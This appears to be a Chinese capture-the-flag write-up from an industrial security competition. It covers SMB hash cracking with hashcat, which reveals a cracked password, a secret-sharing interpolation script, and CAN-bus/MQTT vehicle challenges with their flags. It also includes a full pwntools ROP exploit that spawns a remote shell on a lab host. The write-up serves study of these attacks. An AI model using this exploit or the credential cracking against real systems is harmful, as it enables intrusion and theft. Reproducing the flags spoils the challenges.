第八届工业信息安全技能大赛-复赛-海口-day2
day2
信创
信息隐藏技术
sql
末尾是 768的数据过滤.
flag, key ,iv
key: abc123keyxyzzzzz
iv: test789@@@@@@@##
flagenc: 32e16caf6d5604c8850b87b7911aaf5e8bc3ce3c3c3a407c20f5236d4d8c8811
sm2
hashcat -m 5600 share::MicrosoftAccount:8084a9541cc21245:7127a5f398ce6ea22c45304a29b541ea:0101000000000000f5dd10ae0260db015540912ea9f6e6960000000002001e00570049004e002d00340030004e0031004e003700470048004e003400380001001e00570049004e002d00340030004e0031004e003700470048004e003400380004001e00570049004e002d00340030004e0031004e003700470048004e003400380003001e00570049004e002d00340030004e0031004e003700470048004e003400380007000800f5dd10ae0260db0106000400020000000800300030000000000000000100000000200000b10540fd6d6790ab7ff69116128b6050ff3c2689d32ebafb5fc9d1d0db2cd2b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100300030002e003100330038000000000000000000 rockyou.txt --force --show
SHARE::MicrosoftAccount:8084a9541cc21245:7127a5f398ce6ea22c45304a29b541ea:0101000000000000f5dd10ae0260db015540912ea9f6e6960000000002001e00570049004e002d00340030004e0031004e003700470048004e003400380001001e00570049004e002d00340030004e0031004e003700470048004e003400380004001e00570049004e002d00340030004e0031004e003700470048004e003400380003001e00570049004e002d00340030004e0031004e003700470048004e003400380007000800f5dd10ae0260db0106000400020000000800300030000000000000000100000000200000b10540fd6d6790ab7ff69116128b6050ff3c2689d32ebafb5fc9d1d0db2cd2b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100300030002e003100330038000000000000000000:Smb_70017
密码为
Smb_70017
wireshark 配置NTLMSSP, 用密码解密 流量.
接下来是密码部分了。
import sympy
# 粘贴您之前提供的完整数据
private_shares = [
(1, 15812642359676786493606845678568048800710433801652020386501506042966805735881284394167217766278208743603220841792261625495583229134310971548398132224499185658311061918078392186572523270473085521053221032536305381560311382915293866374167863058731710335820117981795899343249166862629826954367474056157577993486832879919144907045940459528780913646828478208979844725307092460538195305727598173092368231431438625491082753510549015860905704598861888574803514144156020271888209476352108608175733391901745040829055585889723268707157741730231116273692255146896726911200368319315807643500970193081073092127545372335652757782022),
(2, 15798599849219342146152429401599546628430816865505189139236397554159159113600676210102937346555735620794569370873021098997521543067698077585969479256887377668715209871319787105704376646535803773885726758930839611696415719346625707232702056747886002123472609164331923724330558980562855237460623927456823819184944985357894498709565789142860339321340130673911627619887343611230679681365814652530932653150169284386162269476672862179232672142312293494130257611424830895850569582422906925981503147178080163549677461217839329623861103106387444637191880032259754372593560060372128951056350940014287374063566910692251925988721),
(3, 13057033804103451553428438123146792682198558142005791177364708836495945280389623989899523853838907650620998092194919036123274589007518258726663253830691992165446299958032205561572557998962165408576191362632712273328194522019629796279768060182856408281018695600520661222860315804375621246010828741287665953924429360532684832625019217053317402502962477652350293377788212982315983435898136088398642114016310859871490313314641790228979826864766224569461868053845372238484416612042950379531536992871607462112932992951107918625537074498869348137633575123458716303159988528811774055192343880807506626973490931605439943805392),
(4, 3159292735012776191774249580277914105845993529339616950204948939725736709673119175907302283258493852564666156583497967114351678932615684702337837135777224099501095386451940495983560614126671008749438807317741469308403389175443352924715385306968818284179806318212614048832584964370470147922244134716149201011437914631030237200235556433476853173208990920589373752397559244705912717298392500364787893063487665568861853941405951637931417890318845994442451657664668667273901544255280993305392025028582262121305894554922457929340616725324359536418015615692267584026282944723605398282770073786742886303871800452514400416245),
(5, 18343783504629888390960481508303295368537550193793558579547024470789188380773564525188289959014265123322750121321984614691222308425709362497936124567680236087147056845542105606255269212833849479488332684883125125680259131926552232316115739567532056340798897516509849350763058418365326650985340408243350833321507307998904848799056766288172993101286271293357165560710761815392841039099051081643043981676780145237004032232845726850676114515261097116174945658005824278268633483705935294250072773062047327363103325092958304256207085224134369817145785090482245385728482498385730844343642897937267998575956257863881025555377)
]
public_shares = [
(1, 6979332173900211202009550094851865830156787530697891899926708651225959896188603504756351594743253447871540385586641269789038521325172909708376541381241682134480073460199759252510309579407113939610532355435783742896318597158828262397945439257858593863145642442027368738513148730714392306520544113465207441235105451509683135283545471569145580127898990175485965058178802973463936524826755139614293322702928741579150523266841513917589444661600713746019558531378537818911846969559165620829467138611185343120378451849832311749648525887344582898480672406067612497991686272277938358236534519899227018827180846431352295756513),
(2, 2357094994429580955498536268169634947476866925154881557058293637118777820562671725426523284395676637808476148304309121494861967016564378249570844733312930038421305839335277226020761608017942942504314014759427784526496297458386758971228289126609092707172787038118407101635151068591776342566594608857122646170907069190964878481070435308244687593828453350709460657584417049068850967633317751404603253992419708797653068894924295151354518762218434829400665850538956381200439794211274084735346994130226641922420763661069586224357106745464080987397331072926995635605718179472165601517839174408888724258667409313839268971555),
(3, 21355161955976116577090166774570587090443773248981583429608090430549914213586367041120681146011267334330722163951611959244550749930138791178164729740203816331792710995834082177565109659158301237634613213588774550997246034581480940204745353063974891643355518877445589313398529657324842043819245056881243769533493829178501773035354516371865315535636084957291519526343302307013912025810821549169546324669992404973843409462355198586677507713055836737103177291991241905086410408979451753552090629815455195863079695698989484476981503839348953670198247535597294232976308738952388986656274477504721682372858821259261005413881),
(4, 14009108791330066614778294017540224412378598888945201582332590079301440706717573716547220577423663333105861145236675298090795090774359243912333791934456197054017122285036889694527624582756903682901379278016343315662968450162267304511088319804961266603054980677224540158959381530495374588651434840900591420566233902226664316506063006244283439244345706581792542570104175329053062291275051734665306291184309302060148062479853050029177487908741669245784076937091289730456898347503079387480056019826116609281163891122834918335603543724594206999865803914107531063628063914710686035624766738820200374793456860021673950745440),
(5, 9915949142943515183488651097529374125325219707856953738177897419226841615784960976630668164607875532119917629212294320609385522039809462184684727852744125256994226023715093595872673747713710167578390440070642493000715743428580045935360853212607120409756002903653446188750429627745689208019903962053343780921194002198697850549927959963735150219401439252465462576262429646259371323212338868622723875019003640875246509216463383658890877674510013975048716715896150926036805068890636041627618382359484787673404531459557135423941230827284466889476135182553190761681414433747308864543401766293871944787066709593196636912627)
]
def get_integer_poly_coeffs(shares):
"""使用拉格朗日插值计算整数多项式系数"""
x = sympy.symbols('x')
points_x = [s[0] for s in shares]
points_y = [s[1] for s in shares]
poly = sympy.S(0)
for i in range(len(points_y)):
basis_num = sympy.S(1)
basis_den = sympy.S(1)
for j in range(len(points_x)):
if i == j: continue
basis_num *= (x - points_x[j])
basis_den *= (points_x[i] - points_x[j])
poly += points_y[i] * (basis_num / basis_den)
return sympy.Poly(sympy.expand(poly), x).all_coeffs()
# --- 主要攻击逻辑 ---
print("步骤 1: 正在为两组份额计算整数多项式...")
coeffs_private_full = get_integer_poly_coeffs(private_shares)
coeffs_public_full = get_integer_poly_coeffs(public_shares)
# 常数项 C0 = f(0)
C0_private = coeffs_private_full[-1]
C0_public = coeffs_public_full[-1]
print(f'{C0_private=}')
print(f'{C0_public=}')
Snake
# coding=utf-8
import base64
from pwn import *
file_name = "./11111"
remote_host, remote_port = "10.10.200.21", 57261
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF(file_name)
context.timeout = 1
context.os = 'linux'
context.log_level = "debug"
if len(sys.argv) < 2:
DEBUG = True
else:
DEBUG = False
if DEBUG:
r = process([file_name])
else:
r = remote(remote_host, remote_port)
def info_addr(msg, addr):
log.info(msg + ": {0}".format(hex(addr)))
if __name__ == '__main__':
pop_rdi = 0x00000000004006a6 # 0x00000000004006a6 : pop rdi ; ret
pop_rsi = 0x00000000004113f3 # 0x00000000004113f3 : pop rsi ; ret
pop_rax_rdx_rbx = 0x0000000000483396 # 0x0000000000483396 : pop rax ; pop rdx ; pop rbx ; ret
syscall = 0x0000000000401dac
bss_addr = 0x0000000000493c9b # 0x0000000000493c9b : /bin/sh
if not DEBUG:
cmd = input()
while cmd != '+':
r.send(cmd)
print(r.recv().decode('utf-8'))
cmd = input()
else:
r.send(b'q')
r.recvuntil('bin/sh\n')
p = b'a' * (0x70)
p += p64(0xdeedbeef)
p += p64(pop_rax_rdx_rbx)
p += p64(0x3b)
p += p64(0)
p += p64(0)
p += p64(pop_rsi)
p += p64(0)
p += p64(pop_rdi)
p += p64(bss_addr)
p += p64(syscall)
p = base64.b64encode(p)
r.sendline(b'Y' + p)
r.send(b'/')
r.interactive()
车路云
追踪 MQTT 幽灵指令
sudo apt install mosquitto-clients
mosquitto_sub -h 10.10.200.12 -p 1883 -t "#"
# dk_flag{7CC57C74}
破解智能车钥匙的 NFC 防线
10cec1f5ccc6cbcdd19b9e9b939998999ed73a
from hex 异或.
Tbox
分析通信数据:
使用工具(如 Wireshark)打开 tbox_data.pcap,分析通信协议和加密方式。
确定通信是否使用了 Diffie-Hellman 密钥交换协议。
提取 Diffie-Hellman 参数:
从 dh_parameters.txt 中提取 Diffie-Hellman 的参数(如素数 pp 和生成元 gg)。
如果通信中包含了 Diffie-Hellman 的公钥交换部分,提取双方的公钥。
破解共享密钥:
如果攻击者能够获取一方的私钥,可以利用 Diffie-Hellman 的公钥和参数计算出共享密钥。
如果私钥未知,可能需要尝试暴力破解或其他密码学攻击(如中间人攻击)。
解密通信数据:
使用计算出的共享密钥解密通信数据。
提取隐藏的 Flag。
dk_flag{Vehicle telemetry: speed=60, fuel=40}
车窗报文获取
candump can0
dk_flag{091}
车辆故障数量读取
cansend can1 710#03190103
candump can1
在您提供的CAN总线消息中,第一条消息是请求消息,第二条消息是响应消息。我们将基于UDS(Unified Diagnostic Services)协议的标准来解析这些消息,并尝试从中提取车辆的故障数量。
请求消息解析
总线名称:can1
ID:710
数据长度:[4] 字节
数据:03 19 01 03
03:可能是消息的功能码或优先级标识,具体含义取决于系统定义。
19:服务标识符(SID),表示这是一个诊断服务请求。在UDS中,19代表“读取DTC信息”。
01:子功能编号,表示请求的是“报告当前已存储的DTC数量”。
03:可能是额外的参数或掩码,用于指定要报告的DTC类型或状态。但在标准的UDS 19 01服务中,通常不需要这个参数,或者它可能有特定的含义,这取决于ECU的实现。
响应消息解析
总线名称:can1
ID:718
数据长度:[8] 字节
数据:06 59 01 FF 01 00 02 00
06:可能是消息的功能码、长度指示或其他标识,具体取决于系统定义。
59:响应的服务标识符(SID),59是19服务的响应SID(19 + 40 = 59,在UDS中,响应SID是请求SID加40)。
01:子功能编号,与请求中的子功能编号匹配,表示这是对“报告当前已存储的DTC数量”请求的响应。
FF:可能表示ECU支持的所有DTC状态位都被设置为有效,或者是一个特定的掩码值,具体含义取决于ECU的实现。在标准的UDS 19 01响应中,这个字节通常不被直接用于表示DTC数量。
01:可能是额外的响应参数或状态码,具体含义取决于ECU的实现。
00 02:这两个字节通常表示符合请求条件的DTC数量。在大多数UDS实现中,这两个字节组合起来表示一个16位的数值。
00 是高字节。
02 是低字节。
因此,将这两个字节组合起来,我们得到的是0x0002,即十进制的2。
结论
根据提供的响应消息,车辆的当前已存储的故障码(DTC)数量是2。请注意,这个解析基于UDS协议的标准理解和常见的实现方式,但具体的消息格式和含义可能会因不同的ECU制造商和车型而有所不同。
dk_flag{2}
车窗控制
点击小车车窗控制 candump can0
dk_flag{1E46321E}
车辆VIN读取
cansend can1 730#0322F190
candump can0
dk_flag{WYUZA1S2FEDK00001}
浙公网安备 33010602011771号